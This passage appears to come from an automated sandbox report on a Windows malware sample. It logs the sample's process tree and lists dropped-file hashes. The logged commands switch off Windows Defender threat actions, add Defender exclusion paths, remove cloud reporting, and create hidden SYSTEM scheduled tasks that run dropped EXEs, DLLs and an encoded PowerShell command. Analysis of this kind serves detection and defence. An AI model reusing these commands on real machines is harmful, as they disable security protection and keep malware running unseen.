\"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3036
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:8
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3104
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GvoOIxMhypioqxYUWFR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GvoOIxMhypioqxYUWFR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QrhBhAIewKJHC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QrhBhAIewKJHC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rJaJUqPnDsUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rJaJUqPnDsUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ryYNpJDBUybU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ryYNpJDBUybU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vckoWffGU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vckoWffGU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\yhlYPCkQXcaQbSVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\yhlYPCkQXcaQbSVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\knLrxBGDCryPZEWZ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\knLrxBGDCryPZEWZ\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GvoOIxMhypioqxYUWFR" /t REG_DWORD /d 0 /reg:323⤵PID:4472
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GvoOIxMhypioqxYUWFR" /t REG_DWORD /d 0 /reg:324⤵PID:1080
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GvoOIxMhypioqxYUWFR" /t REG_DWORD /d 0 /reg:643⤵PID:2368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QrhBhAIewKJHC" /t REG_DWORD /d 0 /reg:323⤵PID:2392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QrhBhAIewKJHC" /t REG_DWORD /d 0 /reg:643⤵PID:3488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rJaJUqPnDsUn" /t REG_DWORD /d 0 /reg:323⤵PID:5000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rJaJUqPnDsUn" /t REG_DWORD /d 0 /reg:643⤵PID:5068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ryYNpJDBUybU2" /t REG_DWORD /d 0 /reg:323⤵PID:1676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ryYNpJDBUybU2" /t REG_DWORD /d 0 /reg:643⤵PID:2344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vckoWffGU" /t REG_DWORD /d 0 /reg:323⤵PID:1748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vckoWffGU" /t REG_DWORD /d 0 /reg:643⤵PID:4248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\yhlYPCkQXcaQbSVB /t REG_DWORD /d 0 /reg:323⤵PID:4268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\yhlYPCkQXcaQbSVB /t REG_DWORD /d 0 /reg:643⤵PID:3424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ /t REG_DWORD /d 0 /reg:323⤵PID:3516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ /t REG_DWORD /d 0 /reg:643⤵PID:2788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\knLrxBGDCryPZEWZ /t REG_DWORD /d 0 /reg:323⤵PID:4588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\knLrxBGDCryPZEWZ /t REG_DWORD /d 0 /reg:643⤵PID:4028
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gECMspjQP" /SC once /ST 01:04:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4516
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gECMspjQP"2⤵PID:1844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gECMspjQP"2⤵PID:4504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sowxjEWsCulfsCpcT" /SC once /ST 01:33:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\knLrxBGDCryPZEWZ\IfwwpebIuCOMZrt\fGJUNRv.exe\" oy /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "sowxjEWsCulfsCpcT"2⤵PID:1296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2324
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1496
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3288
-
C:\Windows\Temp\knLrxBGDCryPZEWZ\IfwwpebIuCOMZrt\fGJUNRv.exeC:\Windows\Temp\knLrxBGDCryPZEWZ\IfwwpebIuCOMZrt\fGJUNRv.exe oy /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:224 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bpCIAYFeZyKMHikKBh"2⤵PID:2460
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:8
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4416
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:3892
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1192
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\vckoWffGU\XCyXDP.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gxWNFYjnrIlwkwP" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxWNFYjnrIlwkwP2" /F /xml "C:\Program Files (x86)\vckoWffGU\wGZJCwz.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "gxWNFYjnrIlwkwP"2⤵PID:2424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxWNFYjnrIlwkwP"2⤵PID:3488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LmSkNVbcyXknPd" /F /xml "C:\Program Files (x86)\ryYNpJDBUybU2\AAbESsS.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "feKFQCAArapkO2" /F /xml "C:\ProgramData\yhlYPCkQXcaQbSVB\azfBRFw.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LcCuXRPRLgEfYpiYS2" /F /xml "C:\Program Files (x86)\GvoOIxMhypioqxYUWFR\cYHKasq.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2676
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KqvBPQPJtlAHeKbmsPE2" /F /xml "C:\Program Files (x86)\QrhBhAIewKJHC\tDvEKzN.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EdnsbscYxaTlTxMBg" /SC once /ST 00:00:22 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\knLrxBGDCryPZEWZ\zcHTtSPB\gJmZOVM.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:828
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "EdnsbscYxaTlTxMBg"2⤵PID:2852
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:4064
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:3876
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1152
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "sowxjEWsCulfsCpcT"2⤵PID:3592
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\knLrxBGDCryPZEWZ\zcHTtSPB\gJmZOVM.dll",#1 /site_id 5254031⤵PID:3356
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\knLrxBGDCryPZEWZ\zcHTtSPB\gJmZOVM.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3132 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EdnsbscYxaTlTxMBg"3⤵PID:3404
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD50a417aeeb0ba39dc1d35c7cf7d1b9002
SHA1d0ed6cad724999949c8c4f69009fc1c8e0865207
SHA256068cfa952d7e88565438253f9aee3f1b9b1ff7904cb0b3079ce76602e6d8d600
SHA5129ec6592c0b8cc06a69ab73d0b3918fdd70778cafb20806b4a875a6e63f5d6efd1d690b0535c10d2fe2b2137477043f4afd9961d01e74d0576b513eee125eeed9
-
Filesize
2KB
MD5c8a691b5e07bcf095cb5ceb85af279fb
SHA1de08150df8f2736b56e1ff4530782824c6249a61
SHA256c5b4e20ff912a55513317817da2d06eaf821ad8c908df28039116aee4df5fb28
SHA51212d8b8ff865665a68e24522e7620da473e51014296bf9746b3d11f93d1bc7b81f56390b462afa34379a74fa8c41677083196bc6975632b93ad17c65bef02ade6
-
Filesize
2KB
MD5b569d018e10fe3b398f41c619979bedf
SHA156a7427f1d7ef86ce08f6e7c92c33f1643f251c7
SHA256beffba08a3e3a581ec19e1849cbfc3e9d9fd44ed9363ca9494481ba91b951d1e
SHA512241953d497f53b1afe1333136a2eb66a95378fac1ca578db653f328e49839907b03455acc524509ee03578094f0626d5efa46349a068efcb37561e6d7f5be9a9
-
Filesize
2KB
MD5f1903a34022fb7238bf78e2598fcedc2
SHA18ab22c3ef0fa6a0de693d906bc79683d4e9a0bc5
SHA2560ed20109487f3d94a1e6cab90376c65244efc6ae9e3c86ac9fdc9a677ac8aea5
SHA5126851bd5aff54db5c90fd02b5b78f483e5ee72944a533faca7df77c86e0a7db3148873b6237f3fe4f526419cf22075de4c8a879865c680476ac1232ccb96f47cf
-
Filesize
2KB
MD59689bfb5b9e9560b7f2ee041cc9e0c1a
SHA1000dddf094acff425bbef5db0063b597eb0b9a70
SHA2564678b027f83056af601155deeee80db286e0e553a0fba3a94ada78d51bb23dd8
SHA5125fb9f8aaacdf3c6eb09ab940b2f3d8f13be2ad5c2aceefb3586dcfe995d53b86e0bc0e2c0a99c8549ac1e080dba6e428e1cf505003bbf2c174c69e3823cdef32
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
Filesize
6.3MB
MD5d67e5112a9d5706d59cd5c1fdd8af7db
SHA11bac813a33ffeda53b449ef435308df0a486f0e0
SHA2560b29727f39cf778dddc2c1208603beb9fb659cb231276e395f2f0e488accb9b7
SHA512b7bd556678d4604efce7459d54252db60497618a95513fcf818606dae1926906e692add1948459b100eff3eec896cc167cc5e200bd00c5bbb8d51a4e87d17399
-
Filesize
6.3MB
MD5d67e5112a9d5706d59cd5c1fdd8af7db
SHA11bac813a33ffeda53b449ef435308df0a486f0e0
SHA2560b29727f39cf778dddc2c1208603beb9fb659cb231276e395f2f0e488accb9b7
SHA512b7bd556678d4604efce7459d54252db60497618a95513fcf818606dae1926906e692add1948459b100eff3eec896cc167cc5e200bd00c5bbb8d51a4e87d17399
-
Filesize
6.9MB
MD5ad2a0e3d5685b98c60b90f162360513d
SHA13732caf9f4c48aefe532d0763cb01afb05ff48a9
SHA256195fd339cd909bbe7eca203088d859c3b8bd2c765a2a8afdc8cbcaf9bd062b65
SHA512be01fc46074470da365751ae927148c3c5aeefa1dcfd44e8bb5a84d2bbdd15b729e72a18c2e14349d06f8a862ac94905d16f6647ca3f9e9aa933b142299ce8ed
-
Filesize
6.9MB
MD5ad2a0e3d5685b98c60b90f162360513d
SHA13732caf9f4c48aefe532d0763cb01afb05ff48a9
SHA256195fd339cd909bbe7eca203088d859c3b8bd2c765a2a8afdc8cbcaf9bd062b65
SHA512be01fc46074470da365751ae927148c3c5aeefa1dcfd44e8bb5a84d2bbdd15b729e72a18c2e14349d06f8a862ac94905d16f6647ca3f9e9aa933b142299ce8ed
-
Filesize
6.9MB
MD5ad2a0e3d5685b98c60b90f162360513d
SHA13732caf9f4c48aefe532d0763cb01afb05ff48a9
SHA256195fd339cd909bbe7eca203088d859c3b8bd2c765a2a8afdc8cbcaf9bd062b65
